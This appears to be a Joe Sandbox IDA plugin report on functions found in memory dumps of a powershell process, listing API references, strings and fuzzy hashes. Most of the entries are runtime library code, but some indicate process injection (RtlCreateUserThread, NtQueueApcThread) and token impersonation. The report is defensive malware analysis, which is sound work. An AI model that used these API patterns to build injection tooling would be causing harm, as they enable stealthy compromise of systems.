Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction ID: c9f603f891c40dfb645f6de864881deffb13384d87b887635f5d3ff1bdf85b11
Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction Fuzzy Hash: C3414739302741C6FA68CE2A99413DEB291F7A7FE0F1C42209E56477D1D63AC4898742

Function 000001A6ED2E48F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2E493A

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

malloc.LIBCMT ref: 000001A6ED2E4945

Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE718
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE71D

free.LIBCMT ref: 000001A6ED2E4A2C
free.LIBCMT ref: 000001A6ED2E4A34
free.LIBCMT ref: 000001A6ED2E4A40
free.LIBCMT ref: 000001A6ED2E4A4D

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 92672388aeb111ae4a498cfb84cb5bb8716f51ccf99680470dd4d67f6dd6a32d
Instruction ID: d175483bb5412b7de9444e9f5e02a6a5f291e51479e2051c36d0147290434ed4
Opcode Fuzzy Hash: 92672388aeb111ae4a498cfb84cb5bb8716f51ccf99680470dd4d67f6dd6a32d
Instruction Fuzzy Hash: 2841DE3A706389CEEA96DB2F54106A96794BB77B98F1D4020DE158B745EE38C80FC306

Function 000001A6ED3354F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED33553A

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

malloc.LIBCMT ref: 000001A6ED335545

Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F318
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F31D

free.LIBCMT ref: 000001A6ED33562C
free.LIBCMT ref: 000001A6ED335634
free.LIBCMT ref: 000001A6ED335640
free.LIBCMT ref: 000001A6ED33564D

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction ID: 3c1bd8e3787fdad316d50ef5d2830ac574527aa6857b7861e17eca56dfef2113
Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction Fuzzy Hash: 2641F33E306785C6EA15DB2E59086AE6794B7B7BC8F0D5220DD658B785DE3CC41EC302

Function 000001A6ED342D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED3431F4: strchr.LIBCMT ref: 000001A6ED34322E
Part of subcall function 000001A6ED3431F4: strchr.LIBCMT ref: 000001A6ED34324C
Part of subcall function 000001A6ED3431F4: malloc.LIBCMT ref: 000001A6ED343264
Part of subcall function 000001A6ED3431F4: malloc.LIBCMT ref: 000001A6ED343271
Part of subcall function 000001A6ED3431F4: rand.LIBCMT ref: 000001A6ED34333D

strchr.LIBCMT ref: 000001A6ED342DD6
_snprintf.LIBCMT ref: 000001A6ED342E0C

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

_snprintf.LIBCMT ref: 000001A6ED342E23

Strings

%s&%s, xrefs: 000001A6ED342E1C
?%s, xrefs: 000001A6ED342E05

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
String ID: %s&%s$?%s
API String ID: 1095232423-1750478248
Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction ID: 27856539fea2b72f100b6d4ec5754d62ee37309c053db880975d2be6d6b28e91
Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction Fuzzy Hash: 4441927A305E80D1EA21DB2ED1452EDA3A0FFAAB95F0C5511DF4827B61EF39D1A78340

Function 000001A6ED35AC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED35ACFA
_isleadbyte_l.LIBCMT ref: 000001A6ED35AD2A
MultiByteToWideChar.KERNEL32 ref: 000001A6ED35AD69
MultiByteToWideChar.KERNEL32 ref: 000001A6ED35ADB7
_errno.LIBCMT ref: 000001A6ED35ADC1

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction ID: d17b56c67a81ee2f17a3538b0dc89981f2382c4943b2b60eab09f1f092f855cb
Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction Fuzzy Hash: 1A41A03A306780C6E760DF1991903A9BBE1FBA7BC1F1C4121EB8957B95DB38D8459701

Function 000001A6ED2EF064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2EF085

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

free.LIBCMT ref: 000001A6ED2EF0C0
fwrite.LIBCMT ref: 000001A6ED2EF101
fclose.LIBCMT ref: 000001A6ED2EF109
free.LIBCMT ref: 000001A6ED2EF116

Part of subcall function 000001A6ED2FE644: _errno.LIBCMT ref: 000001A6ED2FE664

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
Instruction ID: fd652f688c93b9504d260dc841c1bc2ed1b337fca8df0981e54ce6d1f08ee5d3
Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
Instruction Fuzzy Hash: 15112739306640C9EA50E725E0013EE5390ABA6BD0F5C0620AF6D5B7CADE3CC50D8B42

Function 000001A6ED3099EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED3099FD

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED3099F5

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
Instruction ID: 5c025e39d6d7c94f60e3d3dd9e05cdcdde05bfa9464c679559711c9f04f8ddb4
Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
Instruction Fuzzy Hash: F1018179B13644C9FA49AB2CC8413EC62525BB3BB2F9DC301D529073D2E728440C8223

Function 000001A6ED35A5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED35A5FD

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED35A5F5

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction ID: c2e2ce9dd46578ec45278cd6602a0891427222b06ad9339265a9096528ba03a8
Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction Fuzzy Hash: F701AF7E703644C5FA19EB2CC8913EC32929B73B76FAD4301D5290B3D2C72854499713

Function 000001A6ED33D83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 000001A6ED33D9EB

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction ID: a50f082a339132fd17fd00e01d2afa9ba787cb961762c607fed40616877bc0e4
Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction Fuzzy Hash: BD51907A306640C6EB60DF59E9047DD73A0F36BB95F485022EFAA47784DB38D84AC706

Function 000001A6ED2F5228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED2F53EC: malloc.LIBCMT ref: 000001A6ED2F5408

strrchr.LIBCMT ref: 000001A6ED2F52ED
_snprintf.LIBCMT ref: 000001A6ED2F539B

Strings

t permissions in process: %d, xrefs: 000001A6ED2F5345, 000001A6ED2F5366
Failed to impersonate token: %d, xrefs: 000001A6ED2F5358

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintfmallocstrrchr
String ID: Failed to impersonate token: %d$t permissions in process: %d
API String ID: 3587327836-1492073275
Opcode ID: 8bde0d25350954084bff9422c3e5347b4112dda1e9a5fee9a92db8b801991847
Instruction ID: eb89a20367d0799877161bc87f452ef11f5576560153b6ae7ad2f8d5faf840ff
Opcode Fuzzy Hash: 8bde0d25350954084bff9422c3e5347b4112dda1e9a5fee9a92db8b801991847
Instruction Fuzzy Hash: 8E41D538702241CAEB45EB3AA8443EE6791B797BD4F5C5520AF591B7DACF3CC40A8702

Function 000001A6ED342818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 000001A6ED3428A3
GetStartupInfoA.KERNEL32 ref: 000001A6ED3428AD
Sleep.KERNEL32 ref: 000001A6ED3428F4

Part of subcall function 000001A6ED3448D8: GetTickCount.KERNEL32 ref: 000001A6ED3448F1
Part of subcall function 000001A6ED3448D8: GetTickCount.KERNEL32 ref: 000001A6ED344932

Strings

h, xrefs: 000001A6ED34284D

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup
String ID: h
API String ID: 1809008225-2439710439
Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction ID: 6b2ce184ed44901efb090d3dba688ff1f246914554b8e87e0b35bd1f8fc6c457
Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction Fuzzy Hash: 4B41893A604B88CAE310CF69E8406CEB7B5F38A798F544115EE9C53B98DF79C54ACB40

Function 000001A6ED34E1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 000001A6ED34E26D
LookupAccountSidA.ADVAPI32 ref: 000001A6ED34E2B2
_snprintf.LIBCMT ref: 000001A6ED34E2DA

Strings

%s\%s, xrefs: 000001A6ED34E2C8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction ID: 3771e63d760c414b9d97c98563dfcdc484b14e6bda295ad06899152726c40efa
Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction Fuzzy Hash: E731503A305BC1D5E724CF65E8046DA6364F79AB88F488126EA8957B58DF3DC20AC700

Function 000001A6ED344224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED34424E
GetProcAddress.KERNEL32 ref: 000001A6ED34425E

Strings

ntdll.dll, xrefs: 000001A6ED34423B
RtlCreateUserThread, xrefs: 000001A6ED344254

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction ID: 94445d2fad612f573610ad6fc42319e3d02dbfe03b3cebd8676760a7f413ce35
Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction Fuzzy Hash: 3A11F736315B90C2EB20CF55F98458DB7A8F79AB80F998175AA9D43B14DF38C559C700

Function 000001A6ED343C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED343C30
GetProcAddress.KERNEL32 ref: 000001A6ED343C40

Strings

NtQueueApcThread, xrefs: 000001A6ED343C36
ntdll, xrefs: 000001A6ED343C23

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NtQueueApcThread$ntdll
API String ID: 1646373207-1374908105
Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction ID: af74e6041dff795f6b8433c71fb48326a09d85dbcfd9c41e0fb89c35cbe76a95
Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction Fuzzy Hash: 38018F3D311B42C2EA10CB5AF94429EB3A0FBA7BD0F984521DE6947B55DF38C45A8300

Function 000001A6ED340C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED340C79
GetProcAddress.KERNEL32 ref: 000001A6ED340C89

Strings

kernel32, xrefs: 000001A6ED340C72
IsWow64Process, xrefs: 000001A6ED340C7F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction ID: 1909f68f526ea326621795fae9be9e267615f45e10323d13370f034c8982bf16
Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction Fuzzy Hash: 17E09278332601C2EE14CB19E9847996350EBA7780F4C1010995B4A2A1EF2CC98DCB01

Function 000001A6ED3420E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED3420F4
GetProcAddress.KERNEL32 ref: 000001A6ED342104

Strings

kernel32, xrefs: 000001A6ED3420ED
Wow64RevertWow64FsRedirection, xrefs: 000001A6ED3420FA

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction ID: 8cb9f7aa408839f5593be2530399b63a53810eeadc0b1c7d0324ab672d78c4b0
Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction Fuzzy Hash: DFD05E3C723605C1FE29DB9ABE446EC2350AB6BF80F4D1060882A0A360EE2CC18EC311

Function 000001A6ED3420AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED3420BC
GetProcAddress.KERNEL32 ref: 000001A6ED3420CC

Strings

kernel32, xrefs: 000001A6ED3420B5
Wow64DisableWow64FsRedirection, xrefs: 000001A6ED3420C2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction ID: d8a3addac39547978a44f971786736394bedef7dba7731e7129466814992cf38
Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction Fuzzy Hash: D2D05B3C733605C1FD25D755BD446DC63509B6BB80F4D1061882D06350DE2CC18EC311

Function 000001A6ED2FB3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
